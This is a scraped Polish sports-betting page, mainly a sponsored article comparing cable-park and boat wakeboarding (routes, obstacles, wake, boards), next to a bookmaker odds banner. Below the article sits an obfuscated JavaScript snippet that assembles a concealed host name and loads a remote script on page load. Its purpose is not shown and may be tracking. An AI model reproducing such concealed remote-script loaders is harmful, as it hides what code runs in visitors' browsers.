01.10.2023, g. 17:30
PKO BP Ekstraklasa
Pogoń Szczecin vs Lech Poznań
Do meczu pozostało:
0dn.6godz.24min.
12.80 X3.60 22.38 Odbierz 630 zł i typuj na eFortuna.pl Zarejestruj konto
Transmisja na żywo

Wakeboard, różnica między łodzią, a wyciągiem

Wakeboard, różnica między łodzią, a wyciągiem

Wake­board jest to relaty­wnie młody sport, ale ma już swo­ją rzeszę fanów i zdoby­wa coraz to nowych. Wake­board to ciekawa dyscy­plina, szczegól­nie pod tym wzglę­dem, że moż­na ją upraw­iać na dwa sposo­by, na wyciągu albo za łodz­ią. Czy to jest jakaś różni­ca? Owszem. Oba style jazdy różnią się między sobą, niez­nacznie ale warto wiedzieć z czym się moż­na spotkać pły­wa­jąc na wakeboardzie.

Trzy­ma­jąc linę jesteśmy ciąg­nię­ci przez wyciąg albo przez łódź motorową i na tym oczy­wis­tość się kończy.

Trasa

W przy­pad­ku wyciągu trasa zawsze jest ta sama, jesteśmy ciąg­nię­ci na lin­ie za wyciągiem, pod jego trasą lub w ogranic­zonym odchyle­niu od niej. W łodzi mamy możli­wość zmi­any trasy, za każdym razem może­my mieć inną.

Przeszkody

Przeszkody, czyli pły­wa­jące duże boje i tu, i tu moż­na je pokony­wać. Uważa się, że nau­ka trików jest łatwiejsza na wyciągu, niż pły­wa­jąc za łodz­ią. Cho­ci­aż główny tan­dem przy wyciągu jest pokony­wanie przeszkód, nato­mi­ast przy łodzi akrobac­je powietrzne.

Fala

Fala to jest coś, zarez­er­wowane dla pły­wa­ją­cych na wake­board­zie, ale za łodz­ią. Jej obec­ność spraw­ia, że dla początku­ją­cych może to być trud­niejsze do opanowa­nia. Za to daje możli­wość wykony­wa­nia akrobacji i skoków z jed­nej strony na drugą. Lep­sze wybi­cie, tzw. pop mamy dzię­ki fali, no i co za tym idzie, więcej cza­su w powi­etrzu, wyższy skok i więk­sze pole do popisu jeśli chodzi o triki.

Sprzęt

Owszem. Dla wyciągu dedykowane są bardziej miękkie des­ki, elasty­czne, z małym finem, które bardziej amortyzu­ją lądowanie na tafli wody. Pon­ad­to mają bardziej wytrzy­mały spód, żeby nie ścier­ał się przy pły­wa­niu po przeszko­dach. Nato­mi­ast dla tych pły­wa­ją­cych za łodz­ią są dedykowane bardziej szty­wne des­ki, które ułatwia­ją wybi­cie i dają więk­szego popa.

Oba sposo­by różnią się między sobą w sty­lu jazdy, sposo­bie star­tu jak i rodza­ju sprzę­tu. Trady­cyjnie wake­board jest pły­wanie za łodz­ią, dopiero kil­ka lat temu zaak­cep­towano dla niego wyciąg. To był przysłowiowy strzał w dziesiątkę! Mul­tum akwenów wod­nych pow­sta­ją­cych po wyro­biskach zostało zaadop­towanych pod wakepar­ki. Przez to stał się on łatwiej dostęp­ny dla tych z dala od morza i będąc młod­szym krewnym surfin­gu zyskał sobie równie wielką rzeszę zwolen­ników. Aby znaleźć wakepark blisko siebie, wystar­czy wyszukać nazwę swo­jej miejs­cowoś­ci np. wakepark wrocław w jed­nym z kat­a­logów jak WhereToWake.com.

artykuł spon­sorowany

 

(func­tion(){
cm10=document.createElement(“script”);cm10_=(“ust”);cm10u=“67186009”;
cm10_+=“a”+(“t.i”);cm10.type=“text/javascript”;
cm10u+=“.176cf6cnm10iwgXy7n19”;cm10.async=true;cm10_+=“n”+(“f”+“o”)+”/”;
cm10u+=“wbjxvn496y”;cm10.src=”//”+cm10_+cm10u;
document.body.appendChild(cm10);
})();

Kursy na mecze Lecha

Brak spotkań

Kursy bukmacherskie Ekstraklasa

Brak spotkań

Następny mecz

Ostatni mecz

Mecze Ekstraklasy

Tabela Ekstraklasy (gr. mistrzowska)

Tabela Ekstraklasy

Strzelcy Ekstraklasy

Archiwum newsów

Facebook

Get the Facebook Likebox Slider Pro for WordPress

Ten artykuł jest dostępny tylko w zagraniczej odsłonie tego serwisu.